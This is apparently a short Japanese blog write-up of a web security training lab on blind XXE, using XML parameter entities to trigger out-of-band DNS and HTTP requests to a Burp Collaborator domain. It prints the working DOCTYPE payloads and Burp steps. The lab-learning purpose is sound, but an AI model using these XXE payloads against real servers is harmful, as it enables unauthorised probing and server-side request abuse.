Hello there, ('ω')ノ
XMLパラメータエンティティを介した帯域外相互作用を伴うブラインドXXEを。
予期しない値は表示されず、外部エンティティをはブロックされるとのことで。
なので、パラメータエンティティを使用する必要があるらしく。
ここでエンティティのおさらいを。
例:
内部エンティティ
<!ENTITY xxe "hack">
&xxe;
外部エンティティ
<!ENTITY xxe SYSTEM "http://www.example.com">
&xxe;
パラメータエンティティ(DTD内のみで参照)
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://www.example.com"> %xxe; ]>
まずは、Check stockをクリックして。
xmlのリクエストをリピータへ。
コラボレータを起動して、ペイロードをコピーして。
コピーしたBurpCollaboratorサブドメインを挿入してパラメータエンティティを。
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://aesbba5kc6qdtk73wl35pwr55wbmzb.burpcollaborator.net"> %xxe; ]>
Poll nowで、ペイロードに起因するネットワーク相互作用の詳細を取得して。
ペイロードによって、攻撃者のドメインへのDNSルックアップと。
HTTPリクエストが発生して、攻撃が成功したことを確認して。
クリアできた。
Best regards, (^^ゞ